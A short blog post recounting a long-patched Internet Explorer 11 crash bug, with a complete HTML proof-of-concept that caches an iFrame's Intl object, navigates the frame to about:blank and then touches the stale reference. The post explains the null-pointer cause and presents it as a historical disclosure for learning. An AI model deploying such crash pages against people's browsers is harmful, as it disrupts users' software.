DoS: Accessing Destroyed Intl Object After iFrame Navigation

A brief crash report. Saving a reference to an iFrame’s Intl object and then navigating the iFrame to about:blank caused a null pointer dereference in jscript9!ArenaAllocator::AllocZero when the cached reference was later accessed.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_access_destroyed_Intl</title>
</head>
<body>
<iframe width="50" height="20"></iframe>
<script>
var pIntl;
function main()
{
	pIntl = window[0].Intl;
	window[0].location = "about:blank";
	setTimeout("alert(pIntl);", 100);
}
</script>
</body>
</html>

When the iFrame navigated away, its Intl object was destroyed along with the script context. Accessing the stale pIntl reference via alert() triggered lazy initialization of the Intl object in the new (empty) script context, which tried to allocate memory through a now-null arena allocator. The crash was classified as PROBABLY_NOT_EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: Loading MHTML Protocol URL in an iFrame] :: [Referrer Spoof via Server Redirect and Cached Location Object] >